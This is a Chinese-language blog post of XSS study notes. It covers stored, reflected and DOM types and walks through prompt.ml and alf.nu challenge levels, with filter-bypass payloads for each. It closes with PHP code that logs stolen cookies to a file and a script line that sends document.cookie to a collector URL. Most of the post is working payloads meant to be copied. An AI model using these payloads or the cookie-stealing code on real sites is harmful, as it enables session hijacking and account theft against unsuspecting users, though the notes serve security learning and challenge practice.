• 存储型 、反射型、DOM 型这是最常见的三种分类:

存储型
存储型XSS也叫持久型XSS,存储的意思就是Payload是有经过存储的,当一个页面存在存储型XSS的时候,XSS注入成功后,那么每次访问该页面都将触发XSS,典型的例子是:
如留言板
1. 插入留言=>内容存储到数据库
2. 查看留言=>内容从数据库提取出来
3. 内容在页面显示
如果这里存在XSS,Payload可以通过留言内容提交,然后显示在页面的时候可以生效,那么就是典型的存储型XSS。
反射型
反射型XSS也叫非持久型XSS,最常见的是Payload是构造在网址的某个GET参数的值里。 
DOM 型
其实DOM型也属于反射型的一种,不过比较特殊,所以一般也当做一种单独类型
DOM:不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的
Xss 常用语句
<script>alert(/xss/)</script>
<script>alert(xss)</script>
<syn/onload=alert(1)>
<body onload = alert('test1')>
<img src =“http://url.to.file.which/not.exist”onerror = alert(document.cookie);
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
可以插入xss的元素:Form,Iframe,Input,Embed, style,object等元素
可以利用的事件:
onClick() (有人点击表格)
onerror() 加载文档,图片,发生错误
onload() 载入窗口
onmousemover()(光标在对象或区域上移动)
onMouseUp() (攻击者需要让用户点击图像

  • Xss 游戏:http://prompt.ml/0
    等级0
    Text Viewer

function escape(input) {
// warm up
// script should be executed without user interaction
return '<input type="text" value="' + input + '">';

Payload: "><svg/onload=prompt(1)// 
等级1
function escape(input) {
// tags stripping mechanism from ExtJS library
// Ext.util.Format.stripTags
var stripTagsRE = /<\/?[^>]+>/gi;
input = input.replace(stripTagsRE, '');

return '<article>' + input + '</article>';

这段含有<>设为空
Payload :<svg/onload=prompt(1) 
注意:最后又回车或空格
等级2
function escape(input) {
// v-- frowny face
input = input.replace(/[=(]/g, '');

// ok seriously, disallows equal signs and open parenthesis
return input;
}

过滤等号括号
Payload: <svg><script>prompt(1)</script> 
( 为‘(’html 码
等级3:
function escape(input) {
// filter potential comment end delimiters
input = input.replace(/->/g, '_');

// comment the input to avoid script execution
return '<!-- ' + input + ' -->';

Payload:--!> < svg / onload = prompt(1)
等级5
function escape(input) {
// apply strict filter rules of level 0
// filter ">" and event handlers
input = input.replace(/>|on.+?=|focus/gi, '_');

return '<input value="' + input + '" type="text">';

Payload: "type=image src onerror
="prompt(1)
注:对> on开头进行过滤,用事件来触发;正则表达式:无法对多行进去过滤
等级7
function escape(input) {
// pass in something like dog#cat#bird#mouse...
var segments = input.split('#');
return segments.map(function(title) {
// title can only contain 12 characters
return '<p class="comment" title="' + title.slice(0, 12) + '"></p>';
}).join('\n');

Payload: “> < svg / a = #” onload ='/ *#* / prompt(1)'

#做隔断符号,字符个数限制在12个
p class = “ comment ” title = “ ” > < svg / a = “ > </ p> 
<p class = ” comment “ title = ” “ onload ='/ * ” > </ p >
< p class = “ comment ” title = “ * / prompt(1)' ” > </ p >
等级10
function escape(input) {
// (╯°□°)╯︵ ┻━┻
input = encodeURIComponent(input).replace(/prompt/g, 'alert');
// ┬──┬ ノ( ゜-゜ノ) chill out bro
input = input.replace(/'/g, '');

// (╯°□°)╯︵ /(.□. \)DONT FLIP ME BRO
return '<script>' + input + '</script> ';

Payload: p ' rompt(1)

  • xss游戏 https://alf.nu/alert1

等级1:
function escape(s) {
return '<script>console.log("'+s+'");</script>';
}
Payload=");alert(1)//
等级2:
function escape(s) {
s = s.replace(/"/g, '\\"');
return '<script>console.log("' + s + '");</script>';
}
Payload:\");alert(1)//
等级3:
function escape(s) {
s = JSON.stringify(s);
return '<script>console.log(' + s + ');</script>';
}
Payload: </script><svg/onload=alert(1)>
等级4:
function escape(s) {
var url = 'javascript:console.log(' + JSON.stringify(s) + ')';
console.log(url);

var a = document.createElement('a');
a.href = url;
document.body.appendChild(a);
a.click();
payload: %22);alert(1)//
注:href 支持URL ,所以支持URL 编码
等级6
function escape(s) {
// Slightly too lazy to make two input fields.
// Pass in something like "TextNode#foo"
var m = s.split(/#/);

// Only slightly contrived at this point.
var a = document.createElement('div');
a.appendChild(document['create'+m[0]].apply(document, m.slice(1)));
return a.innerHTML;
}
Payload: Comment#><iframe onload=alert(1)
等级8
1
2
3 function escape(s) {
return '<script>console.log("' + s.toUpperCase() + '")</script>';
}
Payload: </script>< iframe onload=&#x61&#x6C&#x65&#x72&#x74(1)>
Js 对大小写敏感 html 不敏感。所以不能写在script内
等级9
function escape(s) {
function htmlEscape(s) {
return s.replace(/./g, function(x) {
return { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": ''' }[x] || x; 
});
}
Payload: \74 body onload=alert(1)// 
<使用八进制\74替换
等级10
function escape(s) {
s = JSON.stringify(s).replace(/<\/script/gi, '');

return '<script>console.log(' + s + ');</script>';
}

Payload: </scrip</scriptt><script>alert(1)//
对</script>转化为空,分成两次就绕过了

  • XSS语句总结:

尽然简短 常用语句:<svg/onload=alert(1)>
闭合语句:"><svg/onload=prompt(1)// 
--!> < svg / onload = prompt(1)
");alert(1)//
绕过正则表达式:加上回车或空格等符号
过滤了等号<script>alert#&40;1)</script>
过滤了< ( 处理方式: 用html码#&40;=’(‘,八进制字符,十六进制字符。
转化成json 字符串,做script闭合: </script><svg/onload=alert(1)>
在连接插入脚本,可以使用URL 编码
把字符变成大写;script对大小写敏感 ,写在标签里,用事件触发:
</script>< iframe onload=&#x61&#x6C&#x65&#x72&#x74(1)>

  • 接收cookie php代码

<?php
$cookie = $_get['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

*接收用户名 密码的 php 代码

插入的语句:

<script>document.location='http://127.0.0.1.cookie.php?cookie=' +document.cookie;<script>

xss 学习(一)的更多相关文章

  1. 第四次:渗透练习,xss学习

    xss学习 一.学习目的 初步了解xss攻击,不包括(DOM类型) 二.附加说明 1.xss介绍 https://baike.baidu.com/item/XSS%E6%94%BB%E5%87%BB/ ...

  2. XSS学习(未完..)

    前言 XSS 漏洞原理非常简单,实际应用中非常灵活,于是通过 prompt(1) to win 来学习学习 正文 工具 分析正则表达式 https://regex101.com/ http://xss ...

  3. PostMessage xss学习和挖掘

    PostMessage xss很有趣,在国外出现了很多次,国内src/众测从没遇到过,挖到过.可能境界还不够,有机会再去试试.好几年前记得心血来潮学过一次,都是半知半解,后来因为重要性不高,不了了之了 ...

  4. XSS学习笔记(四)-漏洞利用全过程

    <script type="text/javascript" reload="1">setTimeout("window.location ...

  5. XSS学习笔记(一个)-点击劫持

    所谓XSS这个场景被触发XSS地方,在大多数情况下,攻击者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻击始终触发浏览器端,攻击的者的目的.一般都是获取用户的C ...

  6. XSS学习笔记(五)-XSS防御

    如果只生产XSS的地方都与输入或输出相关联的.所以错过了主要矛盾.而且,我们将有一个解决问题的办法:您可以输入端砚格过滤,是可能的过滤输出时间,输出到用户的GET或POST中是否有敏感字符: 输入过滤 ...

  7. 【转载】XSS学习笔记

    XSS的分类 非持久型 非持久型XSS也称反射型XSS.具体原理就是当用户提交一段代码的时候,服务端会马上返回页面的执行结果.那么当攻击者让被攻击者提交一个伪装好的带有恶意代码的链接时,服务端也会立刻 ...

  8. 跨站脚本攻击xss学习

    0.认识跨站脚本 举一个跨站脚本的简单例子. 假设一个页面将用户输入的参数直接显示到页面之中.(比如有如下代码) 在实际的浏览器中,在param中提交的参数正常会展示到页面之中.比如输入下面的URL: ...

  9. XSS学习(二)

    尝试操作Cookie 创建一个cookie,需要提供cookie的名字,值,过期时间和相关路径等 <?php setcookie('user_id',123); ?> 它的作用是创建一个c ...

  10. XSS学习(一)

    XSS(一) XSS分类 1.反射型XSS 2.持久性XSS 3.DOM型XSS **** 反射型XSS 也称作非持久型,参数型跨站脚本 主要将Payload附加到URL地址参数中 例如: http: ...

随机推荐

  1. Navicat Premium 12 安装 与 激活

    官方简体中文下载网址:https://www.navicat.com.cn/download/navicat-premium 安装的过程....(都是中文)所以略过. 开始破解....( ...... ...

  2. MySQL主从同步、读写分离配置步骤、问题解决笔记

    MySQL主从同步.读写分离配置步骤.问题解决笔记 根据要求配置MySQL主从备份.读写分离,结合网上的文档,对搭建的步骤和出现的问题以及解决的过程做了如下笔记:       现在使用的两台服务器已经 ...

  3. RecursiveTask和RecursiveAction的使用 以及java 8 并行流和顺序流(转)

    什么是Fork/Join框架        Fork/Join框架是Java7提供了的一个用于并行执行任务的框架, 是一个把大任务分割成若干个小任务,最终汇总每个小任务结果后得到大任务结果的框架. 我 ...

  4. HDU 6098 - Inversion | 2017 Multi-University Training Contest 6

    /* HDU 6098 - Inversion [ 贪心,数论 ] | 2017 Multi-University Training Contest 6 题意: 求出所有B[i] = max(A[j] ...

  5. 创建节点--DOM树

    创建节点 快捷键:innerhtml outerhtml innertext outertext ==============创建节点方法有两种:============== <script s ...

  6. hdu 5187 zhx's contest (快速幂+快速乘)

    zhx's contest Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others) To ...

  7. Cogs 647. [Youdao2010] 有道搜索框(Trie树)

    [Youdao2010] 有道搜索框 ★☆ 输入文件:youdao.in 输出文件:youdao.out 简单对比 时间限制:1 s 内存限制:128 MB [问题描述] 在有道搜索框中,当输入一个或 ...

  8. codeforces723E

    One-Way Reform CodeForces - 723E There are n cities and m two-way roads in Berland, each road connec ...

  9. 基于熵的方法计算query与docs相似度

    一.简单总结 其实相似度计算方法也是老生常谈,比如常用的有: 1.常规方法 a.编辑距离 b.Jaccard c.余弦距离 d.曼哈顿距离 e.欧氏距离 f.皮尔逊相关系数 2.语义方法 a.LSA ...

  10. Hdu 5884

    hdu 5884 Sort 题意: n个有序序列的归并排序.每次可以选择不超过k个序列进行合并,合并代价为这些序列的长度和,总的合并代价不能超过T, 问k最小是多少. 解法: 1:首先想到的是二分这个 ...